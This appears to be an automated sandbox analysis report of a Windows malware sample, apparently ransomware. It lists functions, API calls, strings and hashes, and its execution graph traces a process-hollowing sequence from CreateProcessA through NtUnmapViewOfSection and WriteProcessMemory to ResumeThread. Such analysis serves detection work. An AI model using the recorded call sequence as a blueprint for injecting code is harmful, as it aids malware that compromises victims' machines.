                                                                                                                                        • Instruction Fuzzy Hash: B6014E7240014EBBDF125E85CC428EE3F62BB29354F58841AFE1968131C63AC9B2AB85
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004127A0 Relevance: 6.0, APIs: 4, Instructions: 39stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlenW.KERNEL32 ref: 004127B9
                                                                                                                                        • _malloc.LIBCMT ref: 004127C3
                                                                                                                                          • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                                                          • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                                                          • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(006B0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                                                        • _memset.LIBCMT ref: 004127CE
                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004127E4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2824100046-0
                                                                                                                                        • Opcode ID: d807541a0d1b126bc38ced4668b3b61b472b47aa0d79cc9e7bfc34870b6aacc2
                                                                                                                                        • Instruction ID: 750470dcacb0e1f47d667e481962336cdcd22eeec5e51d764cc358051e51787a
                                                                                                                                        • Opcode Fuzzy Hash: d807541a0d1b126bc38ced4668b3b61b472b47aa0d79cc9e7bfc34870b6aacc2
                                                                                                                                        • Instruction Fuzzy Hash: C6F02735701214BBE72066669C8AFBB769DEB86764F100139F608E32C2E9512D0152F9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00412800 Relevance: 6.0, APIs: 4, Instructions: 28stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlenA.KERNEL32 ref: 00412806
                                                                                                                                        • _malloc.LIBCMT ref: 00412814
                                                                                                                                          • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                                                          • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                                                          • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(006B0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                                                        • _memset.LIBCMT ref: 0041281F
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00412832
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2824100046-0
                                                                                                                                        • Opcode ID: 5d53f8f732e4342f1a2ab947ea56d6b713f7325b43ea2b5621e341dec89f9ad8
                                                                                                                                        • Instruction ID: a3b2a97d17252553cb1267f0baabe0c67c158e4fedc78561389223423b5350a8
                                                                                                                                        • Opcode Fuzzy Hash: 5d53f8f732e4342f1a2ab947ea56d6b713f7325b43ea2b5621e341dec89f9ad8
                                                                                                                                        • Instruction Fuzzy Hash: 74E086767011347BE510235B7C8EFAB665CCBC27A5F50012AF615D22D38E941C0185B4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00414920 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 319COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                        • Opcode ID: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
                                                                                                                                        • Instruction ID: e15d95b7bc4e28eadeb147f52893af2b9f74cdff9e85ed34d7497a2036010d09
                                                                                                                                        • Opcode Fuzzy Hash: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
                                                                                                                                        • Instruction Fuzzy Hash: 86C15C70704209DBCB24CF58D9C09EAB3B6FFC5304720452EE8468B655DB35ED96CBA9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00470040 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset
                                                                                                                                        • String ID: .\crypto\asn1\tasn_new.c
                                                                                                                                        • API String ID: 2102423945-2878120539
                                                                                                                                        • Opcode ID: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
                                                                                                                                        • Instruction ID: a01d7b69f66ede694d5e1501cc12839462a5262961aeb872149f1145b0afa5c3
                                                                                                                                        • Opcode Fuzzy Hash: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
                                                                                                                                        • Instruction Fuzzy Hash: 5D510971342341A7E7306EA6AC82FB77798DF41B64F04442BFA0CD5282EA9DEC44817A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00417D50 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                        • Opcode ID: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
                                                                                                                                        • Instruction ID: 388339a757d446dde0ac97e241c54aefb3b464f1a8010d5a2c21a1bfa385432d
                                                                                                                                        • Opcode Fuzzy Hash: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
                                                                                                                                        • Instruction Fuzzy Hash: AC517F317042099BCF24DF19D9808EAB7B6FF85304B20456FE8158B351DB39ED968BE9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0041B185 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 0041B1BA
                                                                                                                                          • Part of subcall function 004111C0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000,?,?,?), ref: 0041120F
                                                                                                                                          • Part of subcall function 004111C0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00411228
                                                                                                                                          • Part of subcall function 004111C0: CloseHandle.KERNEL32(00000000), ref: 0041123D
                                                                                                                                          • Part of subcall function 004111C0: MoveFileW.KERNEL32(?,?), ref: 00411277
                                                                                                                                          • Part of subcall function 0041BA10: LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                                                                                                                                          • Part of subcall function 0041BA10: RegisterClassExW.USER32(00000030), ref: 0041BA73
                                                                                                                                          • Part of subcall function 0041BA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
                                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0041B4B3
                                                                                                                                        • TranslateMessage.USER32(?), ref: 0041B4CD
                                                                                                                                        • DispatchMessageW.USER32(?), ref: 0041B4D7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                                                                                                                                        • String ID: %username%$I:\5d2860c89d774.jpg
                                                                                                                                        • API String ID: 441990211-897913220
                                                                                                                                        • Opcode ID: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
                                                                                                                                        • Instruction ID: 53fb4cb99f7e95a824910e08ad4bb0dd21933b0d591bc71827c80b4e91f39c04
                                                                                                                                        • Opcode Fuzzy Hash: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
                                                                                                                                        • Instruction Fuzzy Hash: 015188715142449BC718FF61CC929EFB7A8BF54348F40482EF446431A2EF78AA9DCB96
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004516A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: .\crypto\err\err.c$unknown
                                                                                                                                        • API String ID: 0-565200744
                                                                                                                                        • Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                                                                                                                                        • Instruction ID: d1206a4052711c5ef0d05e5a1f97d3c0da723a5ab1c334b9285c6dd525f2274c
                                                                                                                                        • Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                                                                                                                                        • Instruction Fuzzy Hash: 72117C69F8070067F6202B166C87F562A819764B5AF55042FFA482D3C3E2FE54D8829E
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00424168 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 0042419D
                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 00424252
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DebuggerPresent_memset
                                                                                                                                        • String ID: i;B
                                                                                                                                        • API String ID: 2328436684-472376889
                                                                                                                                        • Opcode ID: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
                                                                                                                                        • Instruction ID: b2deef9000060817df5d9888a0c5d5c31052404ed3c7d79a7a675bf972ea9145
                                                                                                                                        • Opcode Fuzzy Hash: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
                                                                                                                                        • Instruction Fuzzy Hash: 3231D57591122C9BCB21DF69D9887C9B7B8FF08310F5042EAE80CA6251EB349F858F59
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0042A77E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042AB93
                                                                                                                                        • ___raise_securityfailure.LIBCMT ref: 0042AC7A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                        • String ID: 8Q
                                                                                                                                        • API String ID: 3761405300-2096853525
                                                                                                                                        • Opcode ID: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                                                                                                                                        • Instruction ID: cc78ca7643d31f84c049b3cf87471233b0d3094e131d8c276326ba2ae67c1d9c
                                                                                                                                        • Opcode Fuzzy Hash: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                                                                                                                                        • Instruction Fuzzy Hash: 4F21FFB5500304DBD750DF56F981A843BE9BB68310F10AA1AE908CB7E0D7F559D8EF45
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00413C40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413CA0
                                                                                                                                          • Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64
                                                                                                                                        • _memset.LIBCMT ref: 00413C83
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
                                                                                                                                        • String ID: vector<T> too long
                                                                                                                                        • API String ID: 1327501947-3788999226
                                                                                                                                        • Opcode ID: 13dbab4e4c979af06a9cf2652985864a633ab205e3cc78c94b6fadd0ced0ada8
                                                                                                                                        • Instruction ID: e8ff6f7d1438dbc4cc0d31425bbcf17e71e6c586c3cd126e38002517ea96b8c1
                                                                                                                                        • Opcode Fuzzy Hash: 13dbab4e4c979af06a9cf2652985864a633ab205e3cc78c94b6fadd0ced0ada8
                                                                                                                                        • Instruction Fuzzy Hash: AB0192B25003105BE3309F1AE801797B7E8AF40765F14842EE99993781F7B9E984C7D9
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0040C919 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _fputws$CreateDirectory
                                                                                                                                        • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                                                        • API String ID: 2590308727-54166481
                                                                                                                                        • Opcode ID: b861cdce013af4209bc30e04672f112ccf944bab98ef41955443f7e5140c860b
                                                                                                                                        • Instruction ID: 548e7949761e073c688dfdb6472f733b12cf2ebad02737ba307de427565b7e5f
                                                                                                                                        • Opcode Fuzzy Hash: b861cdce013af4209bc30e04672f112ccf944bab98ef41955443f7e5140c860b
                                                                                                                                        • Instruction Fuzzy Hash: 9911E672A00315EBCF20DF65DC8579A77A0AF10318F10063BED5962291E37A99588BCA
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00420DB3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        • Assertion failed: %s, file %s, line %d, xrefs: 00420E13
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __calloc_crt
                                                                                                                                        • String ID: Assertion failed: %s, file %s, line %d
                                                                                                                                        • API String ID: 3494438863-969893948
                                                                                                                                        • Opcode ID: 561489f2e4af6d624f58dbcfcda68910edfdae4a72d1be81448c26c2074ac95f
                                                                                                                                        • Instruction ID: 3c5265aa1bf4e9f5ad4874ec33d215fa8746995624eee7e22a7137551c8458fa
                                                                                                                                        • Opcode Fuzzy Hash: 561489f2e4af6d624f58dbcfcda68910edfdae4a72d1be81448c26c2074ac95f
                                                                                                                                        • Instruction Fuzzy Hash: 75F0A97130A2218BE734DB75BC51B6A27D5AF22724B51082FF100DA5C2E73C88425699
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00480620 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 00480686
                                                                                                                                          • Part of subcall function 00454C00: _raise.LIBCMT ref: 00454C18
                                                                                                                                        Strings
                                                                                                                                        • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0048062E
                                                                                                                                        • .\crypto\evp\digest.c, xrefs: 00480638
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset_raise
                                                                                                                                        • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                                                                                                                                        • API String ID: 1484197835-3867593797
                                                                                                                                        • Opcode ID: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                                                                                                                                        • Instruction ID: 96aa535d5fc7c596ca855a62b55a20e08de4f59c43588781e3518ec4b5147bd0
                                                                                                                                        • Opcode Fuzzy Hash: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                                                                                                                                        • Instruction Fuzzy Hash: 82012C756002109FC311EF09EC42E5AB7E5AFC8304F15446AF6889B352E765EC558B99
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044F23E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • std::exception::exception.LIBCMT ref: 0044F251
                                                                                                                                          • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0044F266
                                                                                                                                          • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1240243875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.1240243875.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.1240243875.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                                                                                                                        • String ID: TeM
                                                                                                                                        • API String ID: 757275642-2215902641
                                                                                                                                        • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                                                        • Instruction ID: d1ee5d24d6598838e25116ba354c7cf631fb5eda6106ebacc41b25e9fbee45cd
                                                                                                                                        • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                                                        • Instruction Fuzzy Hash: 8FD06774D0020DBBCB04EFA5D59ACCDBBB8AA04348F009567AD1597241EA78A7498B99
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:1.1%
                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                        Signature Coverage:0%
                                                                                                                                        Total number of Nodes:38
                                                                                                                                        Total number of Limit Nodes:8
                                                                                                                                        execution_graph 33546 4458026 33547 4458035 33546->33547 33550 44587c6 33547->33550 33551 44587e1 33550->33551 33552 44587ea CreateToolhelp32Snapshot 33551->33552 33553 4458806 Module32First 33551->33553 33552->33551 33552->33553 33554 4458815 33553->33554 33556 445803e 33553->33556 33557 4458485 33554->33557 33558 44584b0 33557->33558 33559 44584c1 VirtualAlloc 33558->33559 33560 44584f9 33558->33560 33559->33560 33560->33560 33561 5de0000 33564 5de0630 33561->33564 33563 5de0005 33565 5de064c 33564->33565 33567 5de1577 33565->33567 33570 5de05b0 33567->33570 33574 5de05dc 33570->33574 33571 5de061e 33572 5de05e2 GetFileAttributesA 33572->33574 33574->33571 33574->33572 33575 5de0420 33574->33575 33576 5de04f3 33575->33576 33577 5de04ff CreateWindowExA 33576->33577 33578 5de04fa 33576->33578 33577->33578 33579 5de0540 PostMessageA 33577->33579 33578->33574 33580 5de055f 33579->33580 33580->33578 33582 5de0110 VirtualAlloc GetModuleFileNameA 33580->33582 33583 5de017d CreateProcessA 33582->33583 33584 5de0414 33582->33584 33583->33584 33586 5de025f VirtualFree VirtualAlloc Wow64GetThreadContext 33583->33586 33584->33580 33586->33584 33587 5de02a9 ReadProcessMemory 33586->33587 33588 5de02e5 VirtualAllocEx NtWriteVirtualMemory 33587->33588 33589 5de02d5 NtUnmapViewOfSection 33587->33589 33590 5de033b 33588->33590 33589->33588 33591 5de039d WriteProcessMemory Wow64SetThreadContext ResumeThread 33590->33591 33592 5de0350 NtWriteVirtualMemory 33590->33592 33593 5de03fb ExitProcess 33591->33593 33592->33590

                                                                                                                                        Executed Functions

                                                                                                                                        Function 05DE0110 Relevance: 22.7, APIs: 15, Instructions: 248memorynativethreadCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 05DE0156
                                                                                                                                        • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 05DE016C
                                                                                                                                        • CreateProcessA.KERNELBASE(?,00000000), ref: 05DE0255
                                                                                                                                        • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 05DE0270
                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 05DE0283
                                                                                                                                        • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 05DE029F
                                                                                                                                        • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 05DE02C8
                                                                                                                                        • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 05DE02E3
                                                                                                                                        • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 05DE0304
                                                                                                                                        • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 05DE032A
                                                                                                                                        • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 05DE0399
                                                                                                                                        • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 05DE03BF
                                                                                                                                        • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 05DE03E1
                                                                                                                                        • ResumeThread.KERNELBASE(00000000), ref: 05DE03ED
                                                                                                                                        • ExitProcess.KERNEL32(00000000), ref: 05DE0412
                                                                                                                                        Memory Dump Source
